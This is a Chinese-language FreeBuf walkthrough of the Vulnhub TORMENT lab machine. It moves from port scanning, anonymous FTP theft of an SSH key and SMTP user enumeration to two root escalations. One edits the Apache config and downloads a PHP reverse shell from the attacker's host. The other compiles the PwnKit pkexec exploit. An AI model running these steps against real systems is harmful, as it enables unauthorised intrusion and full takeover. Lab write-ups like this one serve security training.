官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
[Vulnhub] TORMENT IRC+FTP+CUPS+SMTP+apache配置文件权限提升+pkexec权限提升
maptnh- 关注
[Vulnhub] TORMENT IRC+FTP+CUPS+SMTP+apache配置文件权限提升+pkexec权限提升
本文由
maptnh 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.152 | TCP:21,22,25,80,111,139,143,445,631 |
$ nmap -p- 192.168.101.152 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
| -rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
| -rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
| -rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
| -rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
| -rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
| -rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
| -rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
| -rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
| -rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.101.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 84:c7:31:7a:21:7d:10:d3:a9:9c:73:c2:c2:2d:d6:77 (RSA)
| 256 a5:12:e7:7f:f0:17:ce:f1:6a:a5:bc:1f:69:ac:14:04 (ECDSA)
|_ 256 66:c7:d0:be:8d:9d:9f:bf:78:67:d2:bc:cc:7d:33:b9 (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: TORMENT.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=TORMENT
| Subject Alternative Name: DNS:TORMENT
| Not valid before: 2018-12-23T14:28:47
|_Not valid after: 2028-12-20T14:28:47
80/tcp open http Apache httpd 2.4.25
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.25
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 40031/tcp6 mountd
| 100005 1,2,3 41802/udp6 mountd
| 100005 1,2,3 45478/udp mountd
| 100005 1,2,3 55733/tcp mountd
| 100021 1,3,4 38769/udp nlockmgr
| 100021 1,3,4 46631/tcp6 nlockmgr
| 100021 1,3,4 46679/tcp nlockmgr
| 100021 1,3,4 54964/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities ID LOGIN-REFERRALS have AUTH=PLAIN IMAP4rev1 IDLE post-login listed SASL-IR more Pre-login OK ENABLE LITERAL+ AUTH=LOGINA0001
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
| http-methods:
|_ Potentially risky methods: PUT
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home - CUPS 2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
2049/tcp open nfs_acl 3 (RPC #100227)
6667/tcp open irc ngircd
6668/tcp open irc ngircd
6669/tcp open irc ngircd
6672/tcp open irc ngircd
6674/tcp open irc ngircd
40151/tcp open mountd 1-3 (RPC #100005)
46679/tcp open nlockmgr 1-4 (RPC #100021)
55733/tcp open mountd 1-3 (RPC #100005)
56207/tcp open mountd 1-3 (RPC #100005)
Service Info: Hosts: TORMENT.localdomain, TORMENT, irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
本地权限
ftp匿名登录
$ ftp 192.168.101.152
ftp> ls -la
ftp> cd .ssh
ftp> get id_rsa
ftp> cd .ngircd
ftp> get channels
频道:games,tormentedprinter
使用hexchat加入聊天频道
mostmachineshaveasupersecurekeyandalongpassphrase
http://192.168.101.152:631/printers/
提取用户名
Albert
Cherrlt
David
Edmund
Ethan
Eva
Genevieve
Govindasamy
Jessica
Kenny
Patrick
Qinyi
Qiu
Roland
Sara
$ smtp-user-enum -M VRFY -U usernames -t 192.168.101.152
存在用户Patrick和Qiu
$ ssh -i id_rsa patrick@192.168.101.152
输入从irc聊天频道中获取的密码
权限提升
选项 1 : Qiu
$ ls -la /etc/apache2/apache2.conf
当我们重新启动 apache 服务时,它将以 qiu 用户权限执行
$ vi /etc/apache2/apache2.conf
添加User qiuGroup qiu
$ cp /usr/share/webshells/php/php-reverse-shell.php /tmp/
$ cd /var/www/html
$ wget http://192.168.101.128/php-reverse-shell.php
重启主机,使Apache配置文件生效
$ sudo /bin/systemctl reboot
http://192.168.101.152/php-reverse-shell.php
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
选项2 : SUID : pkexec
$ wget https://github.com/ly4k/PwnKit/blob/main/PwnKit.c
$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
$ ./PwnKit
Proof.txt 截屏
Proof.txt 内容
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
maptnh
Ценность жизни выше, чем кража данных.
已在FreeBuf发表 337 篇文章
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Vulnhub
相关推荐
![[Meachines] [Easy] Friendzone LFI+Python-OS库污染权限提升](https://image.3001.net/images/20240729/1722255830_66a789d65261525baa88e.png)
maptnh LV.9
Ценность жизни выше, чем кража данных.
- 337 文章数
- 62 关注者
SKBD(Scorpion-Killer) Linux-SSH长期隐藏后门持久化控制注入工具
2025-03-30
[Meachines] [Medium] YPuffy LDAP+NT-Hash-Pass+PPK-id_rsa+doas+SSH-CA权限提升
2025-03-29
[Meachines] [Medium] Carrier SNMP+CW-1000-X RCE+BGP劫持权限提升
2025-03-29
文章目录